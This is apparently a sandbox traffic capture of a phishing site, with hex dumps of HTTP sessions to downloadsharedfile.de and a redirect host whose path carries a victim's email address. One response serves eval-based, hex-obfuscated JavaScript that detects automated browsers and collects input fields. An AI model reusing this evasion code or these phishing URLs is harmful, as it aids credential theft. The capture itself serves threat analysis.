                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:21:12 UTC1044INHTTP/1.1 503 Service Unavailable
                        Date: Thu, 10 Apr 2025 17:21:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        X-Frame-Options: SAMEORIGIN
                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Pragma: no-cache
                        Expires: 0
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        Set-Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        CF-RAY: 92e3eb55ec437b0b-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:21:12 UTC325INData Raw: 33 33 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                        Data Ascii: 33e3<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
                        2025-04-10 17:21:12 UTC1369INData Raw: 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 3e 65 76 61 6c 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 27 5c 78 32 38 5c 78 36 36 5c 78 37 35 5c 78 36 45 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 38 5c 78 32 39 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 36 5c 78 36 31 5c 78 37 32 5c 78 32 30 5c 78 36 31 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 36 36 5c 78 37 35 5c 78 36 45 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c
                        Data Ascii: ollow" /><script type="text/javascript" charset="utf-8" data-cfasync="false">eval(decodeURIComponent(escape('\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x61\x20\x3D\x20\x66\x75\x6E\x63\x74\x69\x6F\
                        2025-04-10 17:21:12 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 36 5c 78 36 31 5c 78 37 32 5c 78 32 30 5c 78 37 34 5c 78 36 39 5c 78 36 44 5c 78 36 35 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 36 45 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 37 5c 78 36 35 5c 78 37 34 5c 78 35 34 5c 78 36 39 5c 78 36 44 5c 78 36 35 5c 78 32 38 5c 78 32 39 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                        Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x74\x69\x6D\x65\x20\x3D\x20\x6E\x6F\x77\x2E\x67\x65\x74\x54\x69\x6D\x65\x28\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
                        2025-04-10 17:21:12 UTC1369INData Raw: 5c 78 37 33 5c 78 36 35 5c 78 37 32 5c 78 32 30 5c 78 37 34 5c 78 36 46 5c 78 32 30 5c 78 36 36 5c 78 36 39 5c 78 36 37 5c 78 37 35 5c 78 37 32 5c 78 36 35 5c 78 32 30 5c 78 36 46 5c 78 37 35 5c 78 37 34 5c 78 32 30 5c 78 37 34 5c 78 36 46 5c 78 32 30 5c 78 36 37 5c 78 36 35 5c 78 37 34 5c 78 32 30 5c 78 36 31 5c 78 36 45 5c 78 37 33 5c 78 37 37 5c 78 36 35 5c 78 37 32 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36
                        Data Ascii: \x73\x65\x72\x20\x74\x6F\x20\x66\x69\x67\x75\x72\x65\x20\x6F\x75\x74\x20\x74\x6F\x20\x67\x65\x74\x20\x61\x6E\x73\x77\x65\x72\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x21\x77\x69\x6E\x6
                        2025-04-10 17:21:12 UTC1369INData Raw: 78 36 46 5c 78 36 44 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 30 5c 78 37 43 5c 78 37 43 5c 78 32 30 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 34 5c 78 36 46 5c 78 36 44 5c 78 34 31 5c 78 37 35 5c 78 37 34 5c 78 36 46 5c 78 36 44 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 34 33 5c 78 36 46 5c 78 36 45 5c 78 37 34 5c 78 37 32 5c 78 36 46 5c 78 36 43 5c 78 36 43 5c 78 36 35 5c 78 37 32 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 36 33 5c 78 36 38 5c 78 37 32 5c 78 36 46 5c 78 36 44 5c 78 36 39 5c 78 37 35 5c 78 36 44 5c 78 32 30 5c 78 36 32 5c 78 36 31 5c 78 37 33 5c 78 36 35 5c 78 36 34 5c 78 32 30 5c 78 36 31 5c 78 37 35 5c 78 37 34
                        Data Ascii: x6F\x6D\x61\x74\x69\x6F\x6E\x20\x7C\x7C\x20\x21\x77\x69\x6E\x64\x6F\x77\x2E\x64\x6F\x6D\x41\x75\x74\x6F\x6D\x61\x74\x69\x6F\x6E\x43\x6F\x6E\x74\x72\x6F\x6C\x6C\x65\x72\x29\x7B\x2F\x2A\x63\x68\x72\x6F\x6D\x69\x75\x6D\x20\x62\x61\x73\x65\x64\x20\x61\x75\x74
                        2025-04-10 17:21:12 UTC1369INData Raw: 36 34 5c 78 32 39 5c 78 37 42 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 36 34 5c 78 36 46 5c 78 36 33 5c 78 37 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 32 45 5c 78 36 33 5c 78 36 46 5c 78 36 46 5c 78 36 42 5c 78 36 39 5c 78 36 35 5c 78 32 45 5c 78 36 44 5c 78 36 31 5c 78 37 34 5c 78 36 33 5c 78 36 38 5c 78 32 38 5c 78 32 46 5c 78 35 45 5c 78 32 38 5c 78 33 46 5c 78 33 41 5c 78 32 45 5c 78 32 41 5c 78 33 42 5c 78 32 39 5c 78 33 46 5c 78 35 43 5c 78 37 33 5c 78 32 41 5c 78 35 42 5c 78 33 30 5c 78 32 44 5c 78 33 39 5c 78 36 31 5c 78 32 44 5c 78 36 36 5c 78 35 44 5c 78 37 42 5c 78 33 33 5c 78 33 32 5c 78 37 44 5c 78 35 43 5c 78 37 33 5c 78 32 41 5c 78 33 44 5c 78 35 43 5c 78 37 33 5c
                        Data Ascii: 64\x29\x7B\x2A\x2F\x0A\x2F\x2A\x69\x66\x28\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x2E\x6D\x61\x74\x63\x68\x28\x2F\x5E\x28\x3F\x3A\x2E\x2A\x3B\x29\x3F\x5C\x73\x2A\x5B\x30\x2D\x39\x61\x2D\x66\x5D\x7B\x33\x32\x7D\x5C\x73\x2A\x3D\x5C\x73\
                        2025-04-10 17:21:12 UTC1369INData Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 36 5c 78 36 31 5c 78 37 32 5c 78 32 30 5c 78 37 38 5c 78 36 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 36 45 5c 78 36 35 5c 78 37 37 5c 78 32 30 5c 78 35 38 5c 78 34 44 5c 78 34 43 5c 78 34 38 5c 78 37 34 5c 78 37 34 5c 78 37 30 5c 78 35 32 5c 78 36 35 5c 78 37 31 5c 78 37 35 5c 78 36 35 5c 78 37 33 5c 78 37 34 5c 78 32 38 5c 78 32 39 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                        Data Ascii: 0\x20\x20\x20\x20\x20\x20\x76\x61\x72\x20\x78\x68\x74\x74\x70\x20\x3D\x20\x6E\x65\x77\x20\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x28\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
                        2025-04-10 17:21:12 UTC1369INData Raw: 5c 78 37 32 5c 78 37 39 5c 78 35 33 5c 78 36 35 5c 78 36 43 5c 78 36 35 5c 78 36 33 5c 78 37 34 5c 78 36 46 5c 78 37 32 5c 78 34 31 5c 78 36 43 5c 78 36 43 5c 78 32 38 5c 78 32 37 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 32 37 5c 78 32 39 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 32 38 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 34 36 5c 78 36 39 5c 78 36 35 5c 78 36 43 5c 78 36 34 5c 78 37 33 5c 78 32 45 5c 78 36 43 5c 78 36 35 5c 78 36 45 5c 78 36 37 5c 78 37 34 5c 78 36 38 5c 78 32 30 5c 78 33 45 5c 78 32 30 5c 78 33 30 5c 78 32 39 5c 78 32 30 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                        Data Ascii: \x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C\x28\x27\x69\x6E\x70\x75\x74\x27\x29\x3B\x0A\x20\x20\x0A\x20\x20\x69\x66\x20\x28\x69\x6E\x70\x75\x74\x46\x69\x65\x6C\x64\x73\x2E\x6C\x65\x6E\x67\x74\x68\x20\x3E\x20\x30\x29\x20\x7B\x0A\x20\x20\x20\x20\x2
                        2025-04-10 17:21:12 UTC1369INData Raw: 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 37 32 5c 78 36 35 5c 78 36 43 5c 78 36 46 5c 78 36 31 5c 78 36 34 5c 78 32 38 5c 78 32 39 5c 78 33 42 5c 78 30 41 5c 78 32 30
                        Data Ascii: x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x3B\x0A\x20
                        2025-04-10 17:21:12 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 37 32 5c 78 36 35 5c 78 36 43 5c 78 36 46 5c 78 36 31 5c 78 36 34 5c 78 32 38 5c 78 32 39 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                        Data Ascii: 20\x20\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.649705104.21.7.1204434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:12 UTC1127OUTPOST /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        Content-Length: 22
                        sec-ch-ua-platform: "Windows"
                        X-Requested-TimeStamp-Combination:
                        X-Requested-TimeStamp:
                        X-Requested-Type-Combination: GET
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        isII4MbvI2APurt5ZqwJQ7mZWdg: 29292434
                        X-Requested-with: XMLHttpRequest
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        X-Requested-Type: GET
                        Content-type: application/x-www-form-urlencoded
                        X-Requested-TimeStamp-Expire:
                        Accept: */*
                        Origin: https://downloadsharedfile.de
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Referer: https://downloadsharedfile.de/ph
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY
                        2025-04-10 17:21:12 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                        Data Ascii: name1=Henry&name2=Ford
                        2025-04-10 17:21:13 UTC1032INHTTP/1.1 204 No Content
                        Date: Thu, 10 Apr 2025 17:21:13 GMT
                        Connection: close
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        X-Frame-Options: SAMEORIGIN
                        Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Pragma: no-cache
                        Expires: 0
                        X-Server-Powered-By: Engintron
                        X-Robots-Tag: noindex, nofollow
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        Set-Cookie: cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        Set-Cookie: QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMT
                        CF-RAY: 92e3eb584e8d43ef-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.649707104.21.7.1204434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:13 UTC866OUTGET /favicon.ico HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        sec-ch-ua-platform: "Windows"
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Referer: https://downloadsharedfile.de/ph
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY
                        2025-04-10 17:21:13 UTC554INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Apr 2025 17:21:13 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        Server: cloudflare
                        Vary: Accept-Encoding
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable
                        Pragma: public
                        Cf-Cache-Status: HIT
                        Age: 158916
                        CF-RAY: 92e3eb5a9bc59cdd-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:21:13 UTC332INData Raw: 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                        Data Ascii: 13a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.649708104.21.7.1204434840C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:21:13 UTC1125OUTGET /ph HTTP/1.1
                        Host: downloadsharedfile.de
                        Connection: keep-alive
                        Cache-Control: max-age=0
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Referer: https://downloadsharedfile.de/ph
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI
                        2025-04-10 17:21:14 UTC396INHTTP/1.1 404 Not Found
                        Date: Thu, 10 Apr 2025 17:21:14 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        X-Content-Type-Options: nosniff
                        X-Content-Type-Options: nosniff
                        X-Xss-Protection: 1; mode=block
                        X-Xss-Protection: 1; mode=block
                        Cf-Cache-Status: DYNAMIC
                        Server: cloudflare
                        CF-RAY: 92e3eb5d4a8de8a6-EWR
                        alt-svc: h3=":443"; ma=86400
                        2025-04-10 17:21:14 UTC327INData Raw: 31 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                        Data Ascii: 140<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                        2025-04-10 17:21:14 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.649731167.172.166.2264436120C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2025-04-10 17:22:28 UTC698OUTGET /aruberg@grahamgoldentech.com HTTP/1.1
                        Host: 33vh88.perthshiregardenrooms.co.uk
                        Connection: keep-alive
                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br, zstd
                        Accept-Language: en-US,en;q=0.9
                        2025-04-10 17:22:29 UTC475INHTTP/1.1 302 Found
                        Server: nginx/1.18.0 (Ubuntu)
